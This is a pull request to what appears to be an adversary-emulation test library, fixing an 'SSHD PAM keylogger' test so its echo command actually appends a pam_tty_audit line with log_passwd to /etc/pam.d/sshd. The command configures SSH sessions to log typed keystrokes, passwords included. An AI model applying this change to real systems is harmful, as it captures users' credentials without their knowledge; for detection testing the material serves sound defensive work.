### PR TITLE
T1056.001 - fix SSHD PAM keylogger command

### DIFF
--- a/atomics/T1056.001/T1056.001.yaml
+++ b/atomics/T1056.001/T1056.001.yaml
@@ -137,7 +137,7 @@ atomic_tests:
     elevation_required: true 
     command: | 
       cp -v /etc/pam.d/sshd /tmp/
-      echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"
+      echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
       systemctl restart sshd
       systemctl restart auditd
       ssh #{user_account}@localhost 


### PR DESCRIPTION
**Details:**
This change corrects the `echo` command in the execution of `T1056.001 - SSHD PAM keylogger`. The previous command did not update the file.

**Testing:**
Run the commands in the test and verify the line was added to `/etc/pam.d/sshd`

**Associated Issues:**
None